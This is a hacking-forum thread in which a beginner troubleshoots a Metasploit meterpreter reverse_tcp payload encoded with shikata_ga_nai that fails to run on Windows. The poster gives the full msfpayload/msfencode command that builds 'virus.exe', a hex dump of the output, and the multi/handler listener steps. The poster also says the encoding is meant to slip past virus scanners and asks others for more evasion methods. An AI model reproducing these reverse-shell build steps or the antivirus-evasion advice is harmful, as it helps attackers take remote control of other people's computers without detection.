Jump to content

Payload encoded with shikata_ga_nai not working


IAMGiGaByTeX86
 Share

Recommended Posts

Hey guys,

So i have a little problem which i do not know how to solve.

The problem is that when i encode my payload with x86/shikata_ga_nai and i try it on my windows pc it says it cannot run on the os

this is what i typed

msfpayload windows/meterpreter/reverse_tcp LHOST=HOSTIP LPORT=PORT R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 X > /root/Desktop/virus.exe

did i do something wrong , i tested it on win 8 , win 7 and win xp and it says cannot open on every system :(

Does someone know the solution

Thank you,

Link to comment
Share on other sites

Not sure what is wrong with that code. It's been like 4 years since I've played with that kinda of stuff.

What does the first 10 bytes of hex look like on your output file? Does it match the signature for an executable header?

msfvenom is a framework that combines msfpayload and msfencode.

Info: http://www.offensive-security.com/metasploit-unleashed/Msfvenom

http://www.offensive-security.com/metasploit-unleashed/Exploit_Development

Link to comment
Share on other sites

Thanks for your reply, and yeah i started all the hacking stuff like 3 weeks ago, but i think its alot of fun and i really want to get better at it :D

i runned od -t x1 FILENAME on my virus.exe and this was the outcome,i paste my hex in here.

0000000 be 88 90 6f 3c da c3 d9 74 24 f4 5a 29 c9 b1 49
0000020 31 72 14 83 c2 04 03 72 10 6a 65 93 d4 e3 86 6c
0000040 25 93 0f 89 14 81 74 d9 05 15 fe 8f a5 de 52 24
0000060 3d 92 7a 4b f6 18 5d 62 07 ad 61 28 cb ac 1d 33
0000100 18 0e 1f fc 6d 4f 58 e1 9e 1d 31 6d 0c b1 36 33
0000120 8d b0 98 3f ad ca 9d 80 5a 60 9f d0 f3 ff d7 c8
0000140 78 a7 c7 e9 ad b4 34 a3 da 0e ce 32 0b 5f 2f 05
0000160 73 33 0e a9 7e 4a 56 0e 61 39 ac 6c 1c 39 77 0e
0000200 fa cc 6a a8 89 76 4f 48 5d e0 04 46 2a 67 42 4b
0000220 ad a4 f8 77 26 4b 2f fe 7c 6f eb 5a 26 0e aa 06
0000240 89 2f ac ef 76 95 a6 02 62 af e4 4a 47 9d 16 8b
0000260 cf 96 65 b9 50 0c e2 f1 19 8a f5 f6 33 6a 69 09
0000300 bc 8a a3 ce e8 da db e7 90 b1 1b 07 45 15 4c a7
0000320 36 d5 3c 07 e7 bd 56 88 d8 dd 58 42 71 77 a2 05
0000340 21 e7 d3 2b b5 e5 2b c5 1a 60 cd 8f b2 24 45 38
0000360 2a 6d 1d d9 b3 b8 5b d9 38 4e 9b 94 c8 3b 8f 41
0000400 39 76 ed c4 46 ad 98 e8 d2 49 0b be 4a 53 6a 88
0000420 d4 ac 59 82 dd 38 22 fd 21 ac a2 fd 77 ex,a6 a2 95
0000440 2f 92 f0 80 2f 0f 65 19 ba af dc cd 6d c7 e2 28
0000460 59 48 1c 1f 5b b5 cb 66 d9 cf 79 8b 21
0000475

thats my hex , is anything wrong?

Edited by IAMGiGaByTeX86
Link to comment
Share on other sites

this maybe dumb question. Did u setup msf multi/handler?

Can u try to build a payload with out piping threw the encoder, by default I think shikata is already used by msfpayload.

Also post your multi/handler commands

try a few payloads.

Link to comment
Share on other sites

this maybe dumb question. Did u setup msf multi/handler?

Can u try to build a payload with out piping threw the encoder, by default I think shikata is already used by msfpayload.

Also post your multi/handler commands

try a few payloads.

I will post my entire proces making the payload and exploiting it :D

1. Open terminal
2. msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 X > /root/Desktop/virus.exe


3. open 2nd terminal
4. msfconsole
5. use exploit/multi/handler
6. set payload windows/meterpreter/reverse_tcp
7. set LPORT=MYPORT
8. set LHOST=MYLOCALIP
9. exploit


So yes i use exploit/multi/handler in preparing the exploit in msfconsole.

Also if i create the payload without encoding it with shikataganai it works, but then its getting picked up by virusscanners, so i use the shikata to prevent that, although mubix said shikata is not for avoiding virusscanner and firewalls i dont know any other way to avoid then other then shikata, if you do i would be so thankfull if you post it here :D

Edited by IAMGiGaByTeX86
Link to comment
Share on other sites

These public encoders will be undetectable for how long?

shikata was 100% undetectable for not long.

98% then 95% 90% 80% 50% as virustital showed after only a few months after its release.

Why go public with a fantastic tool like shikata? Or even the tool posted above...

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...